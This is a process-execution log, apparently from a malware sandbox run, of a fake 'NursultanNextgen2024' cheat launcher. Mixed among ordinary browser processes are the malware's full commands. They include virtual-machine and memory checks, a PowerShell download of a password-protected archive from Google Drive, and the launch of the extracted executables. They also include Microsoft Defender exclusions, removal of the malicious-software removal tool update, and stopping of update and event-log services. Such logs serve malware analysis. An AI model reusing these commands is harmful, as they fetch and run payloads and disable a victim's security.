"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5732.0.1632214585\1391202614" -parentBuildID 20221007134813 -prefsHandle 1736 -prefMapHandle 1728 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd230fbb-e971-4509-b4cb-737f7a6ffdde} 5732 "\\.\pipe\gecko-crash-server-pipe.5732" 1824 2d27fad0958 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5732.1.358470785\1059080653" -parentBuildID 20221007134813 -prefsHandle 2172 -prefMapHandle 2168 -prefsLen 21608 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ebf7de68-10db-4b30-93dd-841b736b4cde} 5732 "\\.\pipe\gecko-crash-server-pipe.5732" 2188 2d27f9f9258 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5732.2.792897432\1535101629" -childID 1 -isForBrowser -prefsHandle 2952 -prefMapHandle 2904 -prefsLen 21711 -prefMapSize 233444 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e17c9bd-7923-402d-a333-6352a0124970} 5732 "\\.\pipe\gecko-crash-server-pipe.5732" 2856 2d27fa59d58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5732.3.925930042\169508844" -childID 2 -isForBrowser -prefsHandle 3516 -prefMapHandle 3512 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {01751e09-2681-469b-b4e8-c065624aa2d7} 5732 "\\.\pipe\gecko-crash-server-pipe.5732" 3524 2d20c56c858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5732.4.311031066\1576394655" -childID 3 -isForBrowser -prefsHandle 2648 -prefMapHandle 4792 -prefsLen 26424 -prefMapSize 233444 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b411639b-e97f-40a4-82b7-c66aabea19d7} 5732 "\\.\pipe\gecko-crash-server-pipe.5732" 4848 2d20bd6d858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5732.5.496404861\733536838" -childID 4 -isForBrowser -prefsHandle 4984 -prefMapHandle 4988 -prefsLen 26424 -prefMapSize 233444 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d39dccc-8f97-4e3b-bf42-c1af3692c6e5} 5732 "\\.\pipe\gecko-crash-server-pipe.5732" 5068 2d20dbceb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5732.6.1865986644\1136960289" -childID 5 -isForBrowser -prefsHandle 5180 -prefMapHandle 5184 -prefsLen 26424 -prefMapSize 233444 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7accb6b2-229f-4a4c-916b-52573c239aec} 5732 "\\.\pipe\gecko-crash-server-pipe.5732" 5264 2d20dbd0058 tab
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat
C:\Windows\System32\SystemSettingsBroker.exe
C:\Windows\System32\SystemSettingsBroker.exe -Embedding
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s RmSvc
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s SstpSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s RasMan
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat" "
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\wscript.exe
wscript /b
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\doskey.exe
doskey /listsize=0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download', 'C:\Users\Admin\AppData\Local\Temp\Cache.rar')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -c "Write-Host -NoNewLine $null"
C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\Desktop\NursultanNextgen2024\rar\unrar.exe" x -pNb845nh994nbnj67h45h6 -o+ "C:\Users\Admin\AppData\Local\Temp\Cache.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\doskey.exe
doskey ASSOC=ENDLOCAL
C:\Windows\system32\timeout.exe
timeout /T 10 /NOBREAK
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "Micro"
C:\ProgramData\soft\regedit.exe
C:\ProgramData\soft\regedit.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\doskey.exe
doskey /listsize=0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6108 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=6576 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6396 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6340 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6356 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=6376 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=5556 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=6028 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=6640 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=6724 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=164 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=5424 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6740 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=3020 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5300 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6540 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3960 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=6416 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=5840 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=1600 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=6184 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=5076 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=5792 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=5468 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=6180 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=6216 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=6196 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=6228 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=6780 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=6240 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=8048 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=8224 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=8604 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=8768 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=8356 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --mojo-platform-channel-handle=8164 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --mojo-platform-channel-handle=9100 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --mojo-platform-channel-handle=9304 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --mojo-platform-channel-handle=9268 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --mojo-platform-channel-handle=9608 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --mojo-platform-channel-handle=9772 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --mojo-platform-channel-handle=9544 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --mojo-platform-channel-handle=6288 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=9816 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --mojo-platform-channel-handle=9992 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --mojo-platform-channel-handle=10160 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --mojo-platform-channel-handle=10308 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --mojo-platform-channel-handle=10456 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --mojo-platform-channel-handle=10624 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --mojo-platform-channel-handle=10776 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10124 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8108 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
